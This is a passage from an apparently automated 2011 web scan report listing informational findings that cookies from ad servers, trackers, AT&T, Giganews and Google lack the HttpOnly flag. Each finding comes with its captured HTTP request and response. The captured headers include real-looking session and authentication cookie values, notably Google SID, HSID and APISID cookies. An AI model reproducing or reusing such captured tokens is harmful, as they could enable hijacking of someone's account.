Content-Length: 104

<?xml version="1.0" encoding="UTF-8"?><VAST version="2.0"><error><![CDATA[Err code: 3]]></error></VAST>

12.253. http://usadmm.dotomi.com/dmm/servlet/dmm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000187%2C826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1986338424%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 01:48:36 GMT
X-Name: dmm-s01
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Mon, 16-Sep-2013 01:48:36 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 01:48:36 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain


12.254. http://usenetjunction.com/scripts/track.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usenetjunction.com
Path:   /scripts/track.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/track.php?accountId=default1&url=H_www.easynews.com%2F%2F&referrer=H_www.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&getParams=%3Fgclid%3DCJzUx83AoqsCFRdlgwod-2urfQ&anchor=&isInIframe=false&cookies= HTTP/1.1
Host: usenetjunction.com
Proxy-Connection: keep-alive
Referer: http://www.easynews.com/?gclid=CJzUx83AoqsCFRdlgwod-2urfQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:28 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.2.13-pl0-gentoo
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Set-Cookie: PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx; expires=Mon, 13-Sep-2021 19:31:28 GMT; path=/; domain=.usenetjunction.com
Content-Length: 48
Content-Type: application/x-javascript

setVisitor('abd16110a066614fc7d576400r5Cr6Wx');

12.255. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@2@4e73f12f@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@3@4e73f151@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:01:05 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:01:05 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

12.256. http://vlog.leadforce1.com/bf/bf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vlog.leadforce1.com
Path:   /bf/bf.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bf/bf.php?idsite=6304&url=http%3A%2F%2Fwww.mokafive.com%2FBetterWayVDI%3Fgclid%3DCLDCgauCo6sCFccaQgodS3zc1A&res=1920x1200&h=0&m=26&s=53&cookie=1&urlref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&rand=0.005555952433496714&pdf=1&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=1&action_name=&title=VDI%20the%20way%20it%20should%20be%20%7C%20MokaFive&_lf1=&vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D HTTP/1.1
Host: vlog.leadforce1.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lf1_visitor5577=8%3DMw%3D%3D%3A9%3Dd3d3LmFkb2JlLmNvbQ%3D%3D%3A10%3D%3A6%3DNzYxODQ0OTk%3D%3A7%3DMTMxNDc5NzYzMw%3D%3D%3A1%3DOWYxOWZkZGRhMGJkNTc3M2IzNTg3MzRkMmJjYjc1N2U%3D%3A2%3DMTMxNDc5NzYzMw%3D%3D%3A3%3DMTMxNDc5NzYzMw%3D%3D%3A4%3DNzYxODQ0OTk%3D%3A5%3DMjg5NjUzMQ%3D%3D%3A11%3DMA%3D%3D; lf1_visitor5860=1%3DMTkxMWI1MGFjZTFjYzQ4NDVkMzllYzc1NGExNTFmMGI%3D%3A2%3DMTMxNTQwMDE2Mg%3D%3D%3A3%3DMTMxNTQwMDEwOA%3D%3D%3A4%3DNzcwNTk3OTg%3D%3A5%3DMzEzNjk5Ng%3D%3D%3A11%3DMA%3D%3D; lf1_visitor5340=8%3DNA%3D%3D%3A9%3DR29vZ2xlIEFkcw%3D%3D%3A10%3Dc2VjdXJpdHk%3D%3A6%3DNzc1OTY0MTY%3D%3A7%3DMTMxNTc2MTE2MA%3D%3D%3A1%3DOWM1Njc4MjI0N2EyMmM0MDlmNzM1NDNmN2UxMDk0ZTk%3D%3A2%3DMTMxNTc2MTU5MA%3D%3D%3A3%3DMTMxNTc2MTE2MA%3D%3D%3A4%3DNzc1OTY0MTY%3D%3A5%3DMTgwMDQyMjg%3D%3A11%3DMA%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 17 Sep 2011 00:25:31 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: lf1_visitor6304=8%3DNA%3D%3D%3A9%3DR29vZ2xlIEFkcw%3D%3D%3A10%3DdmlydHVhbCBkZXNrdG9w%3A6%3DNzg1OTUxNTA%3D%3A7%3DMTMxNjIxOTEzMA%3D%3D%3A1%3DOTQyZmEyOWM3MWU2N2M0YmViZDY0YzNhNDY1MzZkOWE%3D%3A2%3DMTMxNjIxOTEzMQ%3D%3D%3A3%3DMTMxNjIxOTEzMA%3D%3D%3A4%3DNzg1OTUxNTA%3D%3A5%3DMTgyMDgyODc%3D%3A11%3DMA%3D%3D; expires=Mon, 16-Sep-2013 00:25:31 GMT; domain=.leadforce1.com
Vary: Accept-Encoding
Content-Length: 43

GIF89a.............!.......,...........D..;

12.257. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wls.wireless.att.com
Path:   /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif?&dcsdat=1316239558350&dcssip=attuverseoffers.com&dcsuri=/tv_hsi_bundles/index.php&dcsqry=%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&dcsref=http%3A//attuverseoffers.com/tv_hsi_bundles/index.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O&WT.mc_id=ECbc0000000WIP00O&WT.tz=-5&WT.bh=1&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AT%26T%20U-verse%20TV%20and%20Internet&WT.js=Yes&WT.bs=1087x870&WT.fi=Yes&WT.fv=10.3&WT.vt_sid=123 HTTP/1.1
Host: wls.wireless.att.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713484570324388; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQwAAAAAAAAAAABAAAAAgAAABECZk5c/WVOAQAAAAEAAAARAmZOXP1lTgEAAAACAAAAIDUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQw

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 07 Oct 2010 01:40:46 GMT
Accept-Ranges: bytes
ETag: "0a360a9c065cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQwAAAAAAAAAAABAAAAAgAAAHP6c05z+nNOAQAAAAEAAABz+nNOc/pzTgEAAAACAAAAIDUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQw; path=/; expires=Tue, 14-Sep-2021 01:40:03 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Sat, 17 Sep 2011 01:40:02 GMT
Connection: close
Content-Length: 43

GIF89a.............!.......,...........D..;

12.258. http://www.att.com/u-verse/availability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /u-verse/availability/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u-verse/availability/ HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 125924
Date: Sat, 17 Sep 2011 01:51:52 GMT
Connection: close
Set-Cookie: TLTHID=9CE93778E0CF10E023F7DBFC78A4493E; Path=/; Domain=.att.com
Set-Cookie: B2CSESSIONID=DGhlTz9XhJykB9!-1935813224; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4200818379; path=/
Set-Cookie: DYN_USER_CONFIRM=a4f794fa32265f84a93d1ee3c2b94f36; path=/


                                                               
...[SNIP]...

12.259. http://www.bradsdeals.com/dealsoftheday/subscribe/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:34:39 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe t
...[SNIP]...

12.260. http://www.elfqrin.com/hacklab/pages/nntpserv.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elfqrin.com
Path:   /hacklab/pages/nntpserv.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hacklab/pages/nntpserv.php HTTP/1.1
Host: www.elfqrin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:25:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.8-0.dotdeb.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.8-0.dotdeb.1
Set-Cookie: edge_language=en; expires=Sun, 16-Oct-2011 19:25:02 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: edge_theme=default
Content-Type: text/html
Content-Length: 9262

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><P><CENTER>
<style type="text/css">
.adHeadline {font: bold 11pt Arial; text-decoration: underline; color: #3333FF;}
.adTe
...[SNIP]...

12.261. http://www.enstarllc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enstarllc.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.enstarllc.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/wac
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 9602-query=; path=/; HttpOnly;
Set-Cookie: 9602%2Duserid=%2D810260; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:08 GMT
Connection: close

<html><head><title>Mailtraq email server - The complete SMTP/POP3/IMAP windows email server solution - Mailtraq eMail server</title><meta name="description" content="Simply the most flexible Windows M
...[SNIP]...

12.262. http://www.giganews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:15 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:31:15 GMT
Set-Cookie: engine_keywords=google%3Bnntp%20server; domain=.giganews.com; path=/
Vary: Accept-Encoding
Content-Length: 22201

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...

12.263. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 16 Sep 2011 19:31:14 GMT
Server: Apache/2.0.54 (Fedora)
Location: /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 16 Sep 2011 19:31:14 GMT
Set-Cookie: paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; domain=.giganews.com; path=/; expires=Fri, 30-Sep-2011 19:31:14 GMT
Set-Cookie: paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; domain=.giganews.com; path=/
Set-Cookie: gac=; domain=.giganews.com; path=/; expires=Thu, 15-Sep-2011 19:31:14 GMT
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="/?gclid=CMbM1MnAoqsCFQN
...[SNIP]...

12.264. http://www.google.com/sorry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sorry/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/?continue=http://www.google.com/search%3Fs%3Fpq%3Dwindows%2Bvirtual%2Bdesktop%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D23%26gs_id%3D3v%26xhr%3Dt%26q%3Dwindows%2520virtual%2520desktop%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3D%26aq%3D%26aqi%3D%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2,or.r_gc.r_pw.%26biw%3D1087%26bih%3D870%26ech%3D2%26psi%3De-hzTu6UEazYiAKVrZS0Ag.1316237087043.6%26emsg%3DNCSR%26noj%3D1%26ei%3DlOhzTvesD4rliALP7emzAg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=yriFazr4YzG_-3ugE2lAyg; path=/; domain=.google.com
Date: Sat, 17 Sep 2011 00:25:44 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3804
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?s?pq=windows+virtual
...[SNIP]...

12.265. http://www.google.com/sorry/Captcha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sorry/Captcha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

